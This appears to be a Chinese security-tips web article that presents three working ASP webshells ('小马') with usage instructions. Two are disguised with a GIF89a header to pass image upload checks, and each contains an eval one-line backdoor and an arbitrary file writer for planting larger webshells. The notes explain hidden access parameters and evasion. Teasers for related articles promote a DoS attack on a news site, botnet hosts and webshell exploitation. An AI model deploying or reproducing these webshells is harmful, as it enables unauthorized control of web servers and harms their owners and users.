几款双功能免杀超强版asp小马

所属分类: 实用技巧 / 安全教程 阅读数: 1663
收藏 0 赞 0 分享
第一款:
复制代码 代码如下:

GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form("filepath")
msg=Request.form("message")
if Trim(request("filepath"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&msg& "")
if err =0 Then
response.write "<font color=red>ok</font>"
else
response.write "<font color=red>no</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<form method="POST" ACTION="">
<input type="text" size="20" name="filepath"
value="<%=server.mappath("go.asp")%>"> <BR>
<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>
<input type="submit" name="Send" value="go">
</form></body></html></body></html>

第二款:
复制代码 代码如下:

GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<% if request("action")="kof97" then %>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<% end if %>
</body></html>

第三款:
复制代码 代码如下:

<%set s=server.createObject("Adodb.Stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="gb2312"%>
<%s.writetext request("d")%>
<%s.SaveToFile server.mappath("go.asp"),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea name=d cols=80 rows=10 width=32></textarea>
<input type=submit>
</form>

使用说明及介绍:
第一款 功能说明: 用一句话连接进行传马 或直接传马

GIF89a$ ;<hTml>
--[这里的意思相信大家都了解 意思就是 上传图片时起到欺骗的作用.]

<%eval request(chr(1))%>
--[这是就asp一句话木马 这里的 chr(1) 就是asp一句话木马的密码
那么实际chr(1)= 所以密码为 别说你不知知道
重点来了 当你用这个ASP小马时 你可以用这个asp小马来里面的一句话进行传大马 然也可以直接用这个传大马

这里的go.asp就是上传马的地址了 这个自己可以修改 说的够详细吧
第二款:
同上功能就不说了!

<% if request("action")="kof97" then %>
相信懂ASP的一看就明白! 也不多说了
用法是 直接在你小马地址后面加上 ?action=kof97 给个例子吧
http://www.xxx.com/xxx.asp?action=kof97 kof97这个改成自己的!在小马里面改
好处就是 当别人直接访问你的小马时 显示的是空白 无法使用你的小马 与要密码的小马差不多
第三款:
可以说是除了ASP一句话小马之外就非它莫属了! 只有两百多个字节

<%s.SaveToFile server.mappath("go.asp"),2%>
当你打开小马地址就会自动生成go.asp 修改成自己的
此小马要与 一句话小马 或其它小马 配合使用 当你在在输入框写入我们的马 然后点 提交 会自动生成go.asp 小马地址
好处就是 当别人直接访问你的小马时 不管他提交什么马 他不知道你设置的那个文件地址
更多精彩内容其他人还在看

如何防止QQ被盗密码 比较详细找回qq号的方法

今天小编教大家如何更高几率的找回QQ密码,需要的朋友可以参考一下
收藏 0 赞 0 分享

在肉鸡上架设全能服务器的方法介绍

肉鸡上架设服务器当看见别人有自己网站的时候,你是不是也很想有一个自己的WEB站点呢?可是建站需要空间,象偶这样的穷人都没钱买空间,只有自己动手,正所谓自己动手丰衣足食,别忘了,DIY永远是黑客的精神!
收藏 0 赞 0 分享

webshell查看IIS站点配置的方法

得到了网站的webshell我们就可以查看服务器的iis的所有站点了,试个不错的方法,如果安全设置好了,也不会有问题
收藏 0 赞 0 分享

让侮辱中国人的法国cnn网站完蛋

让侮辱中国人的法国cnn网站完蛋!!!只要你帮助打开一个网页!! 如何DOS攻击CNN网站? ?将这些文字复制,并保存成一个html文件,然后在浏览器中打开,按提示启用脚本,然后,每隔3秒钟将自动连接一次cnn网站(注意,是自动的,只要你不关闭浏览器窗口就可以了,也不会影响你
收藏 0 赞 0 分享

最新的无权限挂马方式

我写这文章并不是教大家怎么跑去挂马啊,挂马是不对的!不过有的时候真的很想做些让人觉得痛快的事情,因为我就碰到很多的管理员,你跟他说服务器有问题吧!他不信,你改些东西警告他吧,他比你还勤快,你一改他马上覆盖回去,让人真的很郁闷。
收藏 0 赞 0 分享

注册表导出管理员密码文件

来源:红狼 sa默认可以读sam键.应该。
收藏 0 赞 0 分享

不用xp_cmdshell照样执行命令

删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell 利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了 主要是由于Jet允许调用VBA的shell()函
收藏 0 赞 0 分享

MySQL注入中导出字段内容的研究通过注入导出WebShell

大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0 赞 0 分享

Dedecms getip()的漏洞利用代码

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0 赞 0 分享

NtGodMode.exe任意密码登录windows系统帐号下载

NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
收藏 0 赞 0 分享
查看更多